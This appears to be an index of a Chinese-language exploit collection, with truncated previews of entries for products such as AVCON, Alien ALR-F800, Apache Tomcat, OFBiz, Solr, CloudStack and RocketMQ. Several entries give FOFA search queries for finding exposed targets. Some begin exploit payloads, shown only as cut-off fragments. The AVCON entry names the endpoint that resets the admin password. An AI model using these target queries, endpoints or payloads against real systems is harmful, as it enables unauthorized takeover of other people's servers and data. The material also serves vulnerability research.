A43-2Avcon-网络视频服务系统-PermissionAC 漏洞描述: AVCON-网络视频服务系统通过接口 /avcon/av_user/editusercommit.php?currentpage=1 重置admin用户的密码,从而登录系统后台。 fofa语法: title==“avcon
A42-2Alien-ALR-F800-RCE 漏洞描述: Alien Technology ALR-F800存在命令执行漏洞 fofa语法: “ALR-F800” 漏洞复现: payload: POST /cmd.php HTTP/1.1 Host: Accept-Ldwk: bG91ZG9uZ
A42-1Alien-ALR-F800-反序列化RCE 漏洞描述: Alien Technology ALR-F800存在命令注入漏洞 fofa语法: “ALR-F800” 漏洞复现: payload: POST /cmd.php HTTP/1.1 Host: Accept-Ldwk: bG91Z
A41-1Apache-HTTPServer-身份验证绕过 漏洞复现: payload: import requests # Configuration proxy_url = "http://proxy-server.example.com" # Change this to the prox
A40-1Apache-Tomcat-拒绝服务 漏洞复现: payload: import http.client # Configuration host = "target-server" # Change this to the target server address port = 4
A39-2ApacheOFBiz–RCE 漏洞描述: 2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏
A37-1ApacheSolr-log-InformationLeakage 漏洞复现: payload: http://ip/lan.html http://ip/export.html http://ip/email.html http://ip/sms.html
A36-1Apache-CloudStack-PermissionAC 漏洞描述: Apache软件基金会发布了一则关于其开源云计算平台Apache CloudStack的严重漏洞(CVE-2024-41107)的安全公告。此漏洞影响安全断言标记语言(SAML)认证机制,可能允许攻击者绕过认证,获得
A35-1Apache-RocketMQ-InformationLeakage 漏洞描述: 受影响版本中存在敏感信息泄露漏洞,未经授权的用户可以在启用身份验证和授权功能的情况下获得敏感信息。拥有普通用户权限的攻击者可以通过特定接口窃取管理员账号和密码从而获得RocketMQ权限。 修复版本中,通过增
A31-1安达通-TPN-2G安全网关-RCE 漏洞描述: 在安达通 TPN-2G 安全网关中发现了一处远程代码执行漏洞,攻击者可以通过admin_getLisence接口直接恶意的表达式执行shell命令,获取服务器权限。 经过分析与研判,该漏洞利用难度低,能够造成远程命令执行,建议尽快修复。 网
